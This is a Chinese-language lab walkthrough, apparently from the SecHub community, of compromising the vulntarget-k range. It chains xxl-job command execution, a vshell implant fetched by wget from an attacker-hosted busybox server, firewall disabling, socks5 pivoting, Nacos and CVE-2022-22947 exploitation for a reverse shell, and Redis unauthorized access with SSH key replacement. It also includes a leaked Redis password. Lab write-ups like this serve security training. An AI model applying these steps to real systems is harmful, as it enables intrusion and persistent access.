guangen2025-08-07文章来源:SecHub网络安全社区
vulntarget-k
xxj-job
tscan全端口扫描
对应框架漏洞检测
通过命令执行上线vshell
Root权限,不用提权
上传fscan扫描内网192.168.100.1/24网段
开启socks5代理
Proxifier开启流量转发
漏洞利用nacos
Spring-Cloud-CVE-2022-22947
spring-actuator-heapdump-file
springcloudgateway
使用漏洞poc反弹shell到外网机器192.168.100.20(10.10.10.136)
地址:https://github.com/anansec/CVE-2022-22947_EXP
Vshell生成正向马
外网机器开启busybox httpd -f -p 8888服务
二层机器wget http://192.168.100.20:8989/tcp_linux_amd64进行下载
两台shell靶机关闭防火墙:ufw disable
Vshell开启正向连接
成功上线
继续新增代理
Redis
二层扫三层网络
22、6379端口
6379利用方式,未授权,ssh替换公钥,计划任务,主从复制,绝对路径写webshell
将nacos泄露的redis信息拿出
knife4j:
redis:
host: 0.0.0.0
password: nbsg@123456
port: 6379
databases: 0,1,2,3,4,5,6,7
timeout: 60000
Kali生成key
ssh-keygen -t rsa
复制到公钥进行替换
Kali进行代理连接
成功获取到shell